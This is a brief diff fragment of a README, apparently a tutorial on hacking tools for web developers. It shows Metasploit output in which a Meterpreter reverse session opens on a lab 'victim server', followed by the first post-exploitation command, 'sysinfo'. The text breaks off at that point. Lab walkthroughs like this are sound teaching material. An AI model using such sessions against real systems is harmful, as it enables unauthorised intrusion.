notsag-dev/hacking-tools-for-web-developers/README.md

 [*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.14:1030) at 2020-09-20 12:49:01 -0400
 ```

 Boom!
 We have open a Meterpreter session on the victim server.
+Let's use it to get some info about the system:

 ```
 meterpreter > sysinfo